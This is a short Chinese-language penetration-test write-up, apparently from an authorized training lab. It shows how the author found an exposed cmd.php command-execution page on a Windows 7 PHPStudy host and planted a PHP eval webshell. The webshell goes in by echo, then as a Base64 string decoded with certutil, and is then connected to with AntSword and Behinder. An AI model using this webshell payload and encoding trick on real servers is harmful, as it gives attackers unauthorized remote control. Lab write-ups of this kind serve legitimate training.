记一次某项目培训的内网渗透
免责声明:
本次测试过程完全在本地或授权环境中进行,仅供学习、参考与技术讨论使用。严禁将本文中描述的方法和技术用于任何非法途径。
本文中提及的所有漏洞已提交并得到修复。读者如有进行类似测试或其他行为,应确保所有操作均在合法和授权的范围内进行。
若读者因使用本文中的内容而进行任何危害网络安全的行为,后果自负,与原作者无关。
本文为原创内容,未经授权,严禁转载、复制或引用。若需转载或引用,请联系原作者获取授权。
首先使用fscan进行内网扫描,发现有不少IP开启HTTP服务,随便打开一个看一下。
http://192.168.8.8
肉眼可见,已经被翻烂。
看到cmd.php
的时候感觉这是一个练习命令执行的文件,访问直接显示phpinfo()
可以看到是Win7的系统,使用的是PHPStudy,说不定还会有MS17-010。
盲猜是通过cmd.php?cmd=
来执行的,使用蚁剑尝试连接死活连不上,不清楚为什么。有知道的师傅欢迎讨论。
所以换个办法,使用echo
来写入一句话木马,看看能不能使用echo
随便写一个先echo 1 > 1.php
,由于是Windows系统不支持ls
,所以用type
查看一下,可以写入。
尝试echo <?php @eval($_POST['cmd']); ?> > 1.php
不过查看文件发现还是1???奇怪了,换种方式试试呢。
echo PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7ID8%2B > 1.php
这是经过Base64
编码过的一句话,嗯写进去了
使用certutil.exe -decode 1.php 3.php
来解编码,然后再来看一下
可以了,再通过蚁剑连一下
可以了,不过用不惯蚁剑,再加上最近冰蝎更新4.0的版本,再丢一个小马连上看看
成功,香香的